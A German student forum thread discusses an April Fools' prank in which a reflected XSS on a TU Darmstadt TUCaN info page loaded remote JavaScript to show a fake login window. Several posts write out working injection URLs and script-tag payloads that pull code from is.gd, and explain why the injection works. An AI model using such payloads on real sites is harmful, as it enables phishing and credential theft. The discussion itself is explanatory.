Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlich

Moderator: Aktive Fachschaft

Benutzeravatar
martin-t
Erstie
Erstie
Beiträge: 21
Registriert: 5. Nov 2009 02:38
Kontaktdaten:

Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlich

Beitrag von martin-t »

Gerade eben drüber gestolpert :shock: : http://www.info.tucan.tu-darmstadt.de/v ... achrichten

Wird hoffentlich noch eine Rundmail diesbezüglich geben, gerade wenn Benutzerkonten komprommitiert wurden...

Benutzeravatar
newizz
Sonntagsinformatiker
Sonntagsinformatiker
Beiträge: 209
Registriert: 30. Jun 2009 16:41

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von newizz »

Das ist doch normal :lol: :)
Datum :wink:
It's your ATTITUDE and not your APTITUDE that determines your ALTITUDE

Benutzeravatar
kroimon
BASIC-Programmierer
BASIC-Programmierer
Beiträge: 111
Registriert: 6. Okt 2009 00:12

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von kroimon »

In diesem Fall ist es harmlos, aber ist diese XSS-Lücke bekannt?
Schließlich ist das eine super Demonstration dafür, wie man an HRZ Benutzerdaten kommen kann...

Gut gemacht, übrigens ;-)
~Stefan

Benutzeravatar
martin-t
Erstie
Erstie
Beiträge: 21
Registriert: 5. Nov 2009 02:38
Kontaktdaten:

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von martin-t »

Damit wäre der 1. April auch schon wieder beendet. Schön, das newizz es auch herausgefunden hat :wink:. Ob die Lücke bekannt ist, weiß ich nicht - aber vielleicht ließt ja einer aus dem TUCan-Kompetenzteam hier mit :lol:...

Benutzeravatar
leviathan
Computerversteher
Computerversteher
Beiträge: 307
Registriert: 30. Jul 2008 14:26
Wohnort: Darmstadt
Kontaktdaten:

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von leviathan »

Das war kein XSS, sondern ein stinkeinfacher JavaScript mit dem ein Loginfenster angezeigt wurde, ohne dass man tatsächlich auf SSO weitergeleitet wurde. Also im Prinzip ein Mini-phishing Angriff :) Zu erkennen zumindest daran dass keine https Session geöffnet wird. Wer da seine Daten eingibt, ist selbst Schuld :)
Ein Programmierer hat immer eine Lösung. Die passt nur nicht immer zum Problem.

Hiwi für Weiterentwicklung des Lernportals (Moodle).

Benutzeravatar
kroimon
BASIC-Programmierer
BASIC-Programmierer
Beiträge: 111
Registriert: 6. Okt 2009 00:12

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von kroimon »

leviathan hat geschrieben:Das war kein XSS, sondern ein stinkeinfacher JavaScript mit dem ein Loginfenster angezeigt wurde, ohne dass man tatsächlich auf SSO weitergeleitet wurde. Also im Prinzip ein Mini-phishing Angriff :) Zu erkennen zumindest daran dass keine https Session geöffnet wird. Wer da seine Daten eingibt, ist selbst Schuld :)
Erst denken, dann schreiben. Es war ein XSS, denn es wurde ein JavaScript von http://is.gd/tucan bzw. http://yourjavascript.com/23351742131/j.js in der http://www.info.tucan.tu-darmstadt.de/verwalten/tipps/ geladen. Der Login-Screen wird per JS gefaked, erscheint einem unbedarften Benutzer aber echt, sodass die eingegebenen Login-Daten einfach vom Skript an einen anderen Webserver weitergegeben werden könnten.

Der echte Link aus dem ersten Post ist übrigens vollständig:

Code: Alles auswählen

http://www.info.tucan.tu-darmstadt.de/verwalten/tipps/?filter=%22%3B%24.getScript%28%22%2F%2Fis.gd%2Ftucan%22%29%3B%22&message=tucan_nachrichten
Es handelt sich also um eine Lücke im Filter-Script der Tipp-Seite...

Edit: Übrigens, wenn dir nur das HTTPS als Sicherheitsmerkmal reicht, dann hast du Glück, dass der Host http://www.info.tucan.tu-... nicht per SSL erreichbar ist, denn sonst wäre dir das wohl nicht aufgefallen ;)
~Stefan

Benutzeravatar
leviathan
Computerversteher
Computerversteher
Beiträge: 307
Registriert: 30. Jul 2008 14:26
Wohnort: Darmstadt
Kontaktdaten:

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von leviathan »

kroimon hat geschrieben:Erst denken, dann schreiben. Es war ein XSS, denn es wurde ein JavaScript von http://is.gd/tucan bzw. http://yourjavascript.com/23351742131/j.js in der http://www.info.tucan.tu-darmstadt.de/verwalten/tipps/ geladen. Der Login-Screen wird per JS gefaked, erscheint einem unbedarften Benutzer aber echt, sodass die eingegebenen Login-Daten einfach vom Skript an einen anderen Webserver weitergegeben werden könnten.

Der echte Link aus dem ersten Post ist übrigens vollständig:

Code: Alles auswählen

http://www.info.tucan.tu-darmstadt.de/verwalten/tipps/?filter=%22%3B%24.getScript%28%22%2F%2Fis.gd%2Ftucan%22%29%3B%22&message=tucan_nachrichten
Es handelt sich also um eine Lücke im Filter-Script der Tipp-Seite...

Edit: Übrigens, wenn dir nur das HTTPS als Sicherheitsmerkmal reicht, dann hast du Glück, dass der Host http://www.info.tucan.tu-... nicht per SSL erreichbar ist, denn sonst wäre dir das wohl nicht aufgefallen ;)
Gut, so kann man es natürlich als XSS auffassen - mein Argument war eher dass es kein XSS gegen das SSO System war, was durchaus schwerwiegender wäre. Hier war XSS noch nicht mal zwingend notwendig, man könnte einfach den JavaScript direkt in den Post embedden (sollte für einen Admin mit Zugang zum Posten von News kein Problem sein)...

Zur Sicherheit: Https alleine reicht nicht, https + bestätigte Identität des SSO servers hätte ich erwartet, bevor ich da meine Daten eingebe. Aber wenn das Loginfenster sofort ohne Ladezeit erscheint und dabei die URL unverändert bleibt, sollte es einem direkt auffallen :)
Ein Programmierer hat immer eine Lösung. Die passt nur nicht immer zum Problem.

Hiwi für Weiterentwicklung des Lernportals (Moodle).

Thomas Huxhorn
Endlosschleifenbastler
Endlosschleifenbastler
Beiträge: 172
Registriert: 6. Okt 2011 15:25

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von Thomas Huxhorn »

Ich kapiers noch nicht. Hätte man auf der Seite nur dann irgendwas komisches gesehen, wenn man versucht hätte sie einzuloggen? Die sah doch ganz normal aus.

robert.n
Nerd
Nerd
Beiträge: 673
Registriert: 29. Sep 2008 19:17

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von robert.n »

Gute Arbeit, martin. Hast mich voll erwischt. ;-)

Ich dachte das sei ein gewöhnlicher April-Scherz.^^

EDIT: Frage:
Warum hast du

Code: Alles auswählen

";$.getScript("//is.gd/tucan");"
verwendet?
Weshalb ist die URL so eigenartig gekürzt?
Und wieso funktioniert das überhaupt (gekürzte URL; und Cross-Origin-Policy sollte doch eigtl. greifen, oder?)?

Ich verwende sonst immer so etwas:

Code: Alles auswählen

"><script src="http://is.gd/tucan"></script> ...

Benutzeravatar
martin-t
Erstie
Erstie
Beiträge: 21
Registriert: 5. Nov 2009 02:38
Kontaktdaten:

Re: Datenleck: TUCaN abgeschaltet - Neuanmeldung erforderlic

Beitrag von martin-t »

@robert: Der Code $.getScript("//is.gd/tucan"); wurde innerhalb eines <script>-Bereiches eingeschleust. $.getScript ist eine jQuery-Methode, //is.gd/tucan ist eine protokoll-relative URL und die Cross-Origin-Policy greift bei JavaScript generell nicht, auch nicht bei dynamisch durch jQuery eingefügten <script>-Elementen.

@Thomas Huxhorn: Zugegeben, der Witz war etwas, äh, spezieller Natur. Inzwischen funktioniert es auch nicht mehr.

@levithian: Extra für dich war auch eine mini-CSRF gegen sso.hrz.tu-darmstadt.de dabei :?

Fun-Fact: Mit dem Internet-Explorer wäre das nicht passiert. :wink:

Antworten

Zurück zu „Allgemein“